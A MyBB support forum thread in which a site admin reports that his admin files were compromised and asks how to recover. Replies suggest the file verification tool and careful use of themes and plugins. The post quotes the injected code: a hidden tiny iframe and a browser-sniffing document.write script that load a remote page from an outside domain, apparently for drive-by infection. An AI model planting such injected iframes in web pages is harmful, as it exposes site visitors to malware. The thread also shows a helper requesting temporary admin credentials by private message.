MyBB Community Forums

Full Version: My forum got hacked. They using malicious code.
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
when i logon to my admin cp to add advertisement code, suddenly i found two weird loading site name.

joomlato.com
donutszzz.biz

and then when i changed my admin theme in preferences. My admin page go to white page..

<html>
<head>
<title></title>
</head>
<body>
&nbsp;
<iframe src="http://joomlato.com/logs/errorr.php" border="0" width="6" height="5" /></body>
</html>

<script type="text/javascript">
if(engine == "msie" || engine == "gecko") document.write('<body><pre> </pre><iframe src="http://joomlato.com/logs/errorr.php" border="0" width="6" height="5" /></body>');
else if(engine == "opera") document.write('<body></body>');
// else if(engine == "khtml") document.write('<body> </body>');
</script> 

the hell is that code appeared in my admin index files.. So for now i cant login to my admin cp due to white page. How to repair this problem
can you run file verification tool available at tools & maintenance section of admin panel to find the changed
files (focus on php & js files) - try direct url for it : forumURL/admin/index.php?module=tools-file_verification
i can't enter the admin panel right now. most index.html files in admin and cache redirect to that script
^ hmm., would you like to PM me required temporary access and change credentials later
caution: see what I've written at bio of my profile and decide yourself to trust / ignore
check your pm Big Grin
When you get your board back up and running, you should probably look into the cause. You might want to make another thread including what version of MyBB you were running, and what plugins.
(2013-10-15, 05:21 AM)Rymax99 Wrote: [ -> ]When you get your board back up and running, you should probably look into the cause. You might want to make another thread including what version of MyBB you were running, and what plugins.

i'm using the latest one.. I've run this board since last year no attack were found until today

do i need to reupload all the files back ??
^ re-uploading the files is not required - keep an eye on the files through file verification tool
and take care when adding the themes / plugin files (also try avoiding advertisements from untrusted sources)